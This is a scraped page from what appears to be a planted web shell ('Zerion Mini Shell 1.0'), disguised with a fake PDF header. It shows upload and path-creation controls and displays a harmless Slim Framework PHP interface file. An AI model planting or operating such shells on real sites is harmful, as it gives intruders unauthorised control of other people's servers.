%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/loslex_o/tracker/vendor/slim/slim/Slim/Interfaces/
Upload File :
Create Path :
Current File : /www/loslex_o/tracker/vendor/slim/slim/Slim/Interfaces/CallableResolverInterface.php

<?php
/**
 * Slim Framework (https://slimframework.com)
 *
 * @license https://github.com/slimphp/Slim/blob/3.x/LICENSE.md (MIT License)
 */

namespace Slim\Interfaces;

use RuntimeException;

interface CallableResolverInterface
{
    /**
     * Invoke the resolved callable.
     *
     * @param callable|string $toResolve
     *
     * @return callable
     *
     * @throws RuntimeException
     */
    public function resolve($toResolve);
}

Zerion Mini Shell 1.0